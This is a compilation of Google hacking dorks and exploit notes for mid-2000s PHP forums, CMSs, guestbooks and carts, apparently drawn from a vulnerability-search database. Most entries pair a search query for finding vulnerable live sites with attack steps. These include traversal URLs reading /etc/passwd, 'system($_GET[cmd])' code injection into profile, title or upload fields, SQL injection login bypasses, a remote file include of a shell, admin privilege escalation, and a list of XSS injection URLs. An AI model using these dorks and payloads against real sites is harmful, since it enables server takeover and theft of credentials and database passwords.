Google Hacking

MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB) <= 1.00 RC4 Related advisory: Patch: http://www.mybboard.com/community/showthread.php?tid=2559 http://fain182.badroot.org http://www.codebug.org Discovered by Alberto Trivero and coded with FAiN182 More Details: http://www.milw0rm.com/id.php?id=1022

Description of Vulnerabilities Multiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information. If the “/flatnuke/foot_news.php” script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation. [..] User-supplied input passed to the “image” parameter in the “thumb.php” script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path. It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.

i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals. http://www.packetstormsecurity.org/0506-exploits/igallery33.txt

Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.php phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability This exploit gives the user all the details about the database connection such as database host, username, password and database name.

Blog Torrent is free, open-source software that provides a way to share large files on your website. vulnerability: free access to the password file http://[target]/[path_of_blog]/data/newusers advisory: http://www.securitytracker.com/alerts/2005/Jul/1014449.html All current versions could be vulnerable depending on directory permissions.

Google Search : intitle:”blog torrent upload”

Vulnerability in EPay systems PHP code including http://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwd advisory: http://www.cyberlords.net/advisories/cl_epay.txt EPay Pro version 2.0 is vulnerable to this issue.

Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1 download page: http://de-neef.net/download.php?file=2 Read the full report here: http://rgod.altervista.org/lookingglass.html

Google Search : intitle:”Looking Glass v20040427″ “When verifying

Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

rgod advises: Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic. software: site: http://www.cyber-cats.com/php/ rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it[/code]

phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions. software: site: http://open.appideas.com download: http://open.appideas.com/Calendar/ original advisory: http://rgod.altervista.org/phpccal.html

MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution / cross site scripting / path disclosure . This search does not find vulnerable versions. software: site: http://www.maxdev.com/ description: http://www.maxdev.com/AboutMD.phtml original advisory: http://rgod.altervista.org/maxdev1073.html

my advisory: [quote] PBLang 4.65 (possibly prior versions) remote code execution / administrative credentials disclosure / system information disclosure / cross site scripting / path disclosure software: description: PBLang is a powerful flatfile Bulletin Board System. It combines many features of a professional board, but does not even require SQL support. It is completely based on text-file. site: http://pblang.drmartinus.de/ download: https://sourceforge.net/project/showfiles.php?group_id=62953 1) system disclosure: you can traverse directories and see any file (if not .php or .php3 etc.) and include any file on target system using ‘../’ chars and null byte (), example: http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd vulnerable code in setcookie.php: … 16 $usrname=$HTTP_GET_VARS['u']; 17 @include($dbpath.’/’.$usrname.’temp’); … 2) remote code execution: board stores data in files, when you register a [username] file without extension is created in /db/members directory, inside we have php code executed when you login, so in location field type: madrid”; system($HTTP_POST_VARS[cmd]); echo ” in /db/members/[username] file we have … $userlocation=”madrid”; system($HTTP_GET_VARS[cmd]); echo “”; … no way to access the script directly, /db/members is .htaccess protected and extra lines are deleted from files after you login, so you should make all in a POST request and re-register this is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum: http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure: you can see password hash of any user or admin sending the command: cat ./db/members/[username] 4) cross site scripting: register and in location field type: madrid”; echo “alert(document.cookie) then check this url: http://[target]/[path]/setcookie.php?u=[username] 5) path disclosure: http://[target]/[path]/setcookie.php?u= googledork: “Software PBLang” filetype:php rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it original advisory: http://rgod.altervista.org/pblang465.html [/quote]

class-1 Forum Software v 0.24.4 Remote code execution software: site: http://www.class1web.co.uk/software description: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed under the GNU General Public License which means that its source is freely-distributed and available to the general public. vulnerability: the way the forum checks attachment extensions… look at the vulnerable code at viewforum.php 256-272 lines. nothing seems so strange, but… what happen if you try to upload a file with this name? : shell.php.’ or ‘a’ =’a [1] SQL INJECTION! The query and other queries like this become: SELECT * FROM [extensions table name] WHERE extension=” or ‘a’ =’a’ AND file_type=’Image’ you have bypassed the check… now an executable file is uploaded, because for Apache, both on Windows and Linux a file with that name is an executable php file… you can download a poc file from my site, at url: http://rgod.altervista.org/shell.zip inside we have: you can do test manually, unzip the file, register, login, post this file as attachment, then go to this url to see the directory where the attachment has been uploaded: http://[target]/[path]/viewattach.php you will be redirected to: http://[target]/[path]/[upload_dir]/ then launch commands: http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20./../db_config.inc to see database username and password and so on… you can see my poc exploit at this url: http://www.rgod.altervista.org/class1.html googledork: “Powered by and copyright class-1″ rgod site: http://rgod.altervista.org mail: retrogod [at] aliceposta . it

AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:” AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable ” etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 … else { if (isset($l) && file_exists(C_PATH.’/languages/’.$l.’/’.$l.’.php’) && $l != ”) { include_once C_PATH.’/languages/’.$l.’/’.$l.’.php’; include_once C_PATH.’/languages/’.$l.’/’.$l.’_.php’; } … you can include arbitrary file on the server using “../” and null byte () (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext] at the begin of the script we have: @ob_start(); look at the php ob_ start man page : “This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.” However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time … but you can execute arbirtrary commands and after to see any file : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: temp.txt’); ?> usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]&cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url: http://rgod.altervista.org/azdg.html

Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. http://secunia.com/product/4356/ http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail

Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution software site: http://www.digital-scribe.org/ description: “Teachers have full control through a web-based interface. Designed for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system. rgod site: http://rgod.altervista.org email: retrogod at aliceposta it

CuteNews 1.4.0 (possibly prior versions) remote code execution software site: http://cutephp.com/ description: “Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection …” rgod site: http://rgod.altervista.org mail: retrogod [at] aliceposta it

Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system. http://www.securityfocus.com/bid/14817/exploit

AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales. Remote PHP File Include Vulnerability http://www.securityfocus.com/archive/1/409529/30/120/threaded

It’s an exact replica of vbulletin but it is free. SQL-Injection Exploit: http://www.governmentsecurity.org/archive/t14850.html

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more. PHP TopSites Discloses Configuration Data to Remote Users: http://www.securitytracker.com/alerts/2005/Jul/1014552.html PS: all versions are vulnerable at time of writing.

Lucid CMS 1.0.11 SQL Injection /Login bypass this is the dork for ther version I tested: “Powered By: lucidCMS 1.0.11″ advisory/poc exploit: http://rgod.altervista.org/lucidcms1011.html we have an XSS even: http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt

cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report at http://search.securityfocus.com/archive/1/411591/30/0/threaded

Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scripting my advisory & poc exploit: http://rgod.altervista.org/cyphor019.html rgod Moderator PS: The software is longer maintained.

XOOPS 2.2.3 Arbitrary local file inclusion This a generic dork for the version I tested, advisory & poc exploit: http://rgod.altervista.org/xoops_xpl.html

XOOPS WF_Downloads (2.05) module SQL injection This a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit: http://rgod.altervista.org/xoops_xpl.html

http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta= “This website was created with phpWebThings 1.4″ this is Secunia advisory: http://secunia.com/advisories/17410/ and my exploit that show a new vulnerability in “msg” parameter: http://rgod.altervista.org/phpwebth14_xpl.html

This dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit: http://rgod.altervista.org/mambo452_xpl.html

dork: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can’t find it in GHDB and I am surprised of how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board”; error_reporting(0); ini_set(”max_execution_time”,0); system($_GET[cmd]); echo ” now in config.dat we have: … $title=”Ultimate PHP Board “; error_reporting(0); ini_set(”max_execution_time”,0); system($_GET[cmd]); echo ” “; … in header.php we have: … include “./db/config.dat”; … so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd

Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues advisory & poc exploit: http://rgod.altervista.org/guppy459_xpl.html

Xaraya <=1.0.0 RC4 Denial of Service explaination: http://rgod.altervista.org/xarayaDOS.html exploit: http://rgod.altervista.org/xarayaDOS_xpl.html

this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit: http://rgod.altervista.org/sugar_suite_40beta.html

PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure advisory: http://rgod.altervista.org/phpcoin122.html more generic: “Powered By phpCOIN” to see previous verions (not tested)

Vulnerability Description SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided. Solution Description Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Products: * SimpleMedia SimpleBBS 1.1 Affected Vulnerability classification: * Remote vulnerability * Input manipulation attack * Impact on integrity * Exploit unavailable * Verified More info on Vuln: http://www.securityfocus.com/bid/15594

CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398 Moderator note: “Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke”

PHPGedView <=3.3.7 remote code execution advisory & poc exploit: http://rgod.altervista.org/phpgedview_337_xpl.html

Gtchat install file. You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.

“index of” intext:fckeditor inurl:fckeditor this dork is for FCKEditor script through editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands… however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them… this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html

this is for Linpha <=1.0 arbitrary local inclusion: http://retrogod.altervista.org/linpha_10_local.html intext:”LinPHA Version” intext:”Have fun” to see version in description in Linpha 0.9 branch there is sql injection through cookies also to bypass admin login, search for exploit

intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.php perl exploit: http://retrogod.altervista.org/admbook_122_xpl.html

a cgi-bin executables xss/html injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=”>[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=”>[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=”>[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=”>[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=”>[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=”>[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=”>[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=”>[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=”>[XSS HERE]&LIMIT=50&YEAR=”> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=”>[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html][XSS HERE]&page=1 inurl:webstat.exe ext:exe inurl:/*cgi*/ http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE]

Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code. exploit (i haven’t tested it) http://www.securityfocus.com/archive/1/305392 my version of exploit http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps

forums powered by ubbthreads are vulnerable to file inclusion. You can get more results with yahoo search. http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt? http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded

The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677 for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.

According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server.

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. Attacker From there, hit “Admin” then do the following: Leave username field blank. For password, enter this exactly: ‘) OR (’a’ = ‘a You are now in the Guestbook’s Admin section. http://www.securityfocus.com/bid/10209

VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything. According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site. The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:”VP-ASP Shopping Cart *” -”5.0″ to find unpatched servers.